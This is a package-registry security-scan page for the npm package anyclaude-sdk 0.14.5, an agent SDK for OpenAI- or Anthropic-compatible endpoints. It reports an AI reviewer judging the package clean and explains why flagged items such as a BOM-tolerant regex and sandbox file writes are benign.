registry  /  anyclaude-sdk  /  0.14.5

anyclaude-sdk@0.14.5

Standalone, browser-compatible SDK providing Claude Code agent capabilities (tools, tool loop, multi-turn, MCP, sub-agents, sessions) against any OpenAI/Anthropic-compatible LLM endpoint. Runs in the browser (WebContainer), Node, and Bun — no backend requ

AI Security Review

scanned 2d ago · by lpm-firewall-ai

No confirmed malicious attack surface was found. Risky primitives are package-aligned SDK capabilities for agent workspaces and user-configured LLM/MCP/network tools, not hidden install-time or import-time behavior.

Static reason
High-risk behavior combination matched malicious policy.
Trigger
User imports SDK and explicitly calls query(), sandbox, tool, MCP, telemetry, or update APIs.
Impact
No evidence of credential harvesting, unauthorized persistence, destructive behavior, or covert exfiltration.
Mechanism
User-invoked agent SDK capabilities with optional telemetry/update checks.
Rationale
Static inspection found normal SDK functionality: LLM clients, agent tools, optional sandbox shell/filesystem operations, MCP clients, telemetry, and update checks with visible controls. Scanner findings map to benign BOM parsing and sandbox skeleton writes rather than concrete attack behavior.
Evidence
package.jsondist/index.jsdist/skills/parse.jsdist/fs/linuxTree.jsdist/query.jsdist/telemetry.jsdist/update.jsdist/sandbox/local.jsdist/mcp/stdio.jsdist/tools/bash.jsdist/tools/web_fetch.jsdist/tools/web_search.js
Network endpoints6
anyclaude-telemetry.puter.workregistry.npmjs.orgapi.anthropic.com/v1api.openai.com/v1r.jina.ai/html.duckduckgo.com/html/?q=

Decision evidence

public snapshot
AI called this Clean at 92.0% confidence as Benign with low false-positive risk.
Evidence for block
    Evidence against
    • package.json has no install/postinstall hook; prepublishOnly only builds before publishing.
    • dist/index.js is a barrel export; no import-time execution beyond module exports.
    • dist/skills/parse.js BOM-tolerant regex is not Trojan Source control-flow deception.
    • dist/fs/linuxTree.js only seeds caller-provided sandbox FS with FHS placeholder files.
    • Shell, filesystem writes, MCP stdio, and web tools are SDK features invoked through query/tool APIs, not hidden lifecycle behavior.
    • Telemetry/update checks are source-disclosed, opt-out, coarse, and do not harvest prompts, files, env, or credentials.
    Behavioral surface
    Source
    ChildProcessFilesystemNetworkShell
    Supply chain
    HighEntropyStringsUrlStrings
    ManifestNo manifest risk signals triggered.
    scanned 115 file(s), 428 KB of source, external domains: anyclaude-telemetry.puter.work, api.anthropic.com, api.openai.com, duckduckgo.com, github.com, html.duckduckgo.com, r.jina.ai, registry.npmjs.org, webcontainers.io

    Source & flagged code

    3 flagged · loading source
    dist/fs/linuxTree.jsView file
    27VERSION_ID="1.0" L28: HOME_URL="https://webcontainers.io" L29: `; ... L41: await fs.writeFile('/etc/os-release', OS_RELEASE); L42: await fs.writeFile(`${home}/.bashrc`, ''); L43: }
    Medium
    Install Persistence

    Source writes installer persistence such as shell profile or service configuration.

    dist/fs/linuxTree.jsView on unpkg · L27
    dist/skills/parse.jsView file
    3contains invisible/control Unicode U+FEFF (zero width no-break space) const FRONTMATTER = /^<U+FEFF>?---\r?\n([\s\S]*?)\r?\n---\r?\n?([\s\S]*)$/;
    Critical
    Trojan Source Unicode

    Source contains bidi control or invisible Unicode characters associated with Trojan Source attacks.

    dist/skills/parse.jsView on unpkg · L3
    Trigger-reachable chain: manifest.exports -> dist/skills/index.js -> dist/skills/parse.js Reachable file contains a blocking source-risk pattern.
    Critical
    Trigger Reachable Dangerous Capability

    A package entrypoint or install-time lifecycle script reaches a source file with blocking dangerous behavior.

    dist/skills/parse.jsView on unpkg

    Findings

    2 Critical3 Medium5 Low
    CriticalTrojan Source Unicodedist/skills/parse.js
    CriticalTrigger Reachable Dangerous Capabilitydist/skills/parse.js
    MediumNetwork
    MediumInstall Persistencedist/fs/linuxTree.js
    MediumStructural Risk Force Deep Review
    LowNon Install Lifecycle Scripts
    LowScripts Present
    LowFilesystem
    LowHigh Entropy Strings
    LowUrl Strings